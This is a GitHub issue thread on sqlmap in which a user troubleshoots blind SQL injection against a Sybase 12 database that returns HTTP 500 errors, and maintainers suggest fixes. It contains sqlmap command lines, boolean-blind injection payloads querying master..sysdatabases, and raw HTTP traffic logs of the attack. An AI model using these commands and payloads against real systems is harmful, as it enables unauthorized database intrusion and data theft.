### ISSUE TITLE
Legacy DBMS Sybase 12 problems

### ISSUE THREAD

**Issue by AlbertoRu11** [sqlmapproject/sqlmap#2946]
## What's the problem (or question)?
There is a legacy database server were im performing a SQL inyection. The DBMS is  Sybase and banner identify "Adaptive Server Enterprise 12.0". sqlmap idenitfy Blind Boolean SQL Inyection. I can´t perfrom the usual comands such as "--dbs", "--tables" because sqlmap identify "Error 500" on HTTP requests and sqlmap process finishes.

I identify this is not a false positive since I can extract some information from the server with "--sql-query" using sybase global variables (@@version) and sybase functions (db_name, date, host_name, db_user, object_name).

## Do you have an idea for a solution?
Maybe the issue ocurres because Sybase version 12 is a legacy version and is not suported by some technology nowadays. Maybe sqlmap 1.2.2.16 is not compatible with legacy DBMS such as this one.

## How can we reproduce the issue?
1. Perform a blind boolean sql inyection to a Sybase legacy version in my case "Adaptive Server Enterprise 12.0"
2. Sqlmap identfys the Blinf Booleand SQL inyection
3. Perform the comand " ./sqlmap.py --methid=post --data=<DATA> --url=<URL> --no-cast --dbms=sybase --dbs" to extarct database names.
4. Error 500 will apear on console: HTTP requets and sybase process will be finished ([WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases)

## What are the running context details?
I do a git clone from the proyect master brench
OS: sqlmap executed on Kali Linux 2018.1.
Program version:  sqlmap 1.2.2.16#dev
No WAF is detected (wafw00f)
SQLi technique found by sqlmap: boolean-based blind
SQL map command: python ./sqlmap.py --method=post --data=cat1&var2--url=https://...com --no-cast --dbms=sybase --dbs
Relevant console output: [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases

Web application target is a codeigniter on centOS. Database server is Sybase 12 on Solaris.
There is a similar issue as mine https://github.com/sqlmapproject/sqlmap/issues/2634

**Comment by klensy** [comment]
try ```--ignore-code=500``` as fast check.

**Comment by AlbertoRu11** [comment]
Still now working...

##Input##

root@DESKTOP-XXXX:/mnt/c/Users/XXXX/sqlmap# python ./sqlmap.py --method=POST --ignore-code=500 --dbms=sybase --data="XXX=XXX" --no-cast --url="XXXX" --threads=9  --dbs 

##Output##
[10:09:55] [INFO] testing connection to the target URL                                                  sqlmap resumed the following injection point(s) from stored session:                                    ---                                                                                                     Parameter: XXXXX (POST)                                                                                Type: boolean-based blind                                                                               Title: AND boolean-based blind - WHERE or HAVING clause                                                 Payload: XXXX=XXX AND 3025=3025                                                               ---                                                                                                     [10:09:55] [INFO] testing Sybase                                                                        [10:09:55] [INFO] confirming Sybase                                                                     [10:09:55] [INFO] the back-end DBMS is Sybase                                                           web server operating system: Linux CentOS                                                               web application technology: Apache 2.4.6, PHP 5.4.16                                                    back-end DBMS: Sybase                                                                                   [10:09:55] [INFO] fetching database names                                                               [10:09:55] [INFO] retrieved:                                                                            [10:09:56] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases                                                                                                                                                                                                             [10:09:56] [WARNING] HTTP error codes detected during run:                                              500 (Internal Server Error) - 3 times                                                                   [10:09:56] [INFO] fetched data logged to text files under '/root/.sqlmap/output/XXXX'                                                                                                              [*] shutting down at 10:09:56

**Comment by Ekultek** [comment]
Drop the amount of threads to 1, get off your VPS, and try running behind a low latency proxy

**Comment by stamparm** [comment]
#2634 is not the similar issue. In that issue Sybase has been misidentified as MsSQL DBMS.

500 means that something really wrong is happening. You should for start take a look into the content of the returned web server response. Maybe something useful can be found there. Use `-t traffic.txt` or `--proxy` to find out.

Other than that, without you debugging the issue at your end I can't help you. Sybase 12 is supported by sqlmap.

**Comment by AlbertoRu11** [comment]
Here is traffic.txt file:

`HTTP request [#2]:                                                                                      POST /XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX HTTP/1.1                                                       Host: XXXX                                                                                Accept-encoding: gzip,deflate                                                                           Cache-control: no-cache                                                                                 Content-type: application/x-www-form-urlencoded; charset=utf-8                                          Accept: */*                                                                                             User-agent: sqlmap/1.2.2.16#dev (http://sqlmap.org)                                                     Cookie: ci_session=4la2cljrsdh883no89mc3i7tqo21634v                                                     Content-length: 162                                                                                     Connection: close                                                                                                                                                                                               XXXX=XXXX%20AND%20ASCII%28SUBSTRING%28%28SELECT%20COUNT%28%2A%29%20FROM%20%28SELECT%20name%20FROM%20master..sysdatabases%29%20AS%20pkcB%29%2C1%2C1%29%29%3E51                                                                                                                                                      HTTP response [#2] (500 Internal Server Error):                                                         Content-length: 0                                                                                       X-powered-by: PHP/5.4.16                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT                                                                  Uri: XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX                                   Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16                                            Connection: close                                                                                       Pragma: no-cache                                                                                        Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0                           Date: Sun, 25 Feb 2018 17:19:57 GMT                                                                     Content-type: text/html; charset=UTF-8                                                                                                                                                                                                                                                                                                                                                                                          ############################################################################                                                                                                                                    HTTP request [#3]:                                                                                      POST /XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX HTTP/1.1                                                       Host: XXXX                                                                                 Accept-encoding: gzip,deflate                                                                           Cache-control: no-cache                                                                                 Content-type: application/x-www-form-urlencoded; charset=utf-8                                          Accept: */*                                                                                             User-agent: sqlmap/1.2.2.16#dev (http://sqlmap.org)                                                     Cookie: ci_session=4la2cljrsdh883no89mc3i7tqo21634v                                                     Content-length: 162                                                                                     Connection: close                                                                                                                                                                                               XXXX=XXXX%20AND%20ASCII%28SUBSTRING%28%28SELECT%20COUNT%28%2A%29%20FROM%20%28SELECT%20name%20FROM%20master..sysdatabases%29%20AS%20pkcB%29%2C1%2C1%29%29%3E48                                                                                                                                                      HTTP response [#3] (500 Internal Server Error):                                                         Content-length: 0                                                                                       X-powered-by: PHP/5.4.16                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT                                                                  Uri: XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX                                   Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16                                            Connection: close                                                                                       Pragma: no-cache                                                                                        Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0                           Date: Sun, 25 Feb 2018 17:19:57 GMT                                                                     Content-type: text/html; charset=UTF-8                                                                                                                                                                                                                                                                                                                                                                                          ############################################################################                                                                                                                                    HTTP request [#4]:                                                                                      POST /XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX HTTP/1.1                                                       Host: XXXX                                                                                 Accept-encoding: gzip,deflate                                                                           Cache-control: no-cache                                                                                 Content-type: application/x-www-form-urlencoded; charset=utf-8                                          Accept: */*                                                                                             User-agent: sqlmap/1.2.2.16#dev (http://sqlmap.org)                                                     Cookie: ci_session=4la2cljrsdh883no89mc3i7tqo21634v                                                     Content-length: 161                                                                                     Connection: close                                                                                                                                                                                               XXXX=XXXX%20AND%20ASCII%28SUBSTRING%28%28SELECT%20COUNT%28%2A%29%20FROM%20%28SELECT%20name%20FROM%20master..sysdatabases%29%20AS%20pkcB%29%2C1%2C1%29%29%3E9                                                                                                                                                       HTTP response [#4] (500 Internal Server Error):                                                         Content-length: 0                                                                                       X-powered-by: PHP/5.4.16                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT                                                                  Uri: XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX                                   Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16                                            Connection: close                                                                                       Pragma: no-cache                                                                                        Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0                           Date: Sun, 25 Feb 2018 17:19:58 GMT                                                                     Content-type: text/html; charset=UTF-8 `

**Comment by AlbertoRu11** [comment]
When i do a **--sql-query "db_name()"** traffic.txt is the following:

`HTTP request [#41]:                                                                                     POST /XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX HTTP/1.1                                                       Host: XXXX                                                                                Accept-encoding: gzip,deflate                                                                           Cache-control: no-cache                                                                                 Content-type: application/x-www-form-urlencoded; charset=utf-8                                          Accept: */*                                                                                             User-agent: sqlmap/1.2.2.16#dev (http://sqlmap.org)                                                     Cookie: ci_session=vaf9dv01jtdkjs851d1rsgtn50rdrsvd                                                     Content-length: 89                                                                                      Connection: close                                                                                                                                                                                               XXXX=XXXX%20AND%20ASCII%28SUBSTRING%28%28SELECT%20db_name%28%29%29%2C8%2C1%29%29%3E1                                                                                                                       HTTP response [#41] (200 OK):                                                                           X-powered-by: PHP/5.4.16                                                                                Transfer-encoding: chunked                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT                                                                  Uri: https://XXXX/%C2%B0GkxX7zMtm21NpzgAIQlrcyl2A4jSnlVgC9jnykH5J4o8pAczzDPl0Nh4K5g2G%C2%B05+5Pg1PBiK47CzA7sWK4thvD%C2%B06Il5%C2%B0TLzibxK%C2%B0S3ypLMpCBbvrLcuHI2%C2%B0mEbISkYom3h7Mgb3TNgLMf%C2%B0BvOFdoFtSxkmStT3nKVF2fSvVmKU=/XXXX                                   Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16                                            Connection: close                                                                                       Pragma: no-cache                                                                                        Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0                           Date: Sun, 25 Feb 2018 17:29:08 GMT                                                                     Content-type: text/html; charset=UTF-8                                                                                                                                                                          <!DOCTYPE html>                                                                                         <html lang="es">                                                                                        <head>     ....`

**Comment by stamparm** [comment]
It is not clear what seems to be the problem as you are getting empty 500 responses. Though, I would say that you have permission problems (or something is blocking your requests) as you are getting those when poking `master..sysdatabases`
